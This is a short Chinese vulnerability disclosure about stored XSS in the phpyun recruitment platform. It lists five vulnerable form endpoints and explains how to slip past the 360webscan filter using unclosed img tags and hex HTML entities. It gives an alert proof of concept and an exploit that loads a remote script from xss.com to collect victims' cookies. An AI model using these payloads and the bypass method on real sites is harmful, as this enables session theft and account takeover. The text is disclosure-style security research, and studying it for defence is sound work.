梦见一个getshell,但因为该死的过滤没绕过。。发xss吧。。。 多处打包,还不走大厂商吗?
phpyun云人才系统处理富文本时,只在客户端进行过滤,服务端没有进行过滤,导致多个富文本编辑框产生XSS。 说一下各个位置。 01.企业用户资料处:member/index.php?C=info 02.企业用户发布招聘信息处:member/index.php?C=jobadd 03.问答系统提问处:ask/index.php?C=addquestion 04.朋友圈发表状态:friend/index.php 05.在线粘贴简历处:member/index.php?C=expectq&add=7 这里提一些点。 首先,要绕过360webscan的防御正则,这个好说,只要<img标签不闭合即可。 还要绕过一些关键词检查,用16进制的html字符实体替换原字符即可。
就拿在线粘贴简历的地方做示范吧。
里面有一个富文本编辑框:
我随便输点东西,然后抓包,修改doc为我的payload:
<img src="#" onerror="alert(/xss/)"
然后提交。一份有xss的简历就生成好了:
给一个加载远程js的exp:
<img src="#" onerror="$.getScript('//xss.com/9WfKui')"
可收到cookie: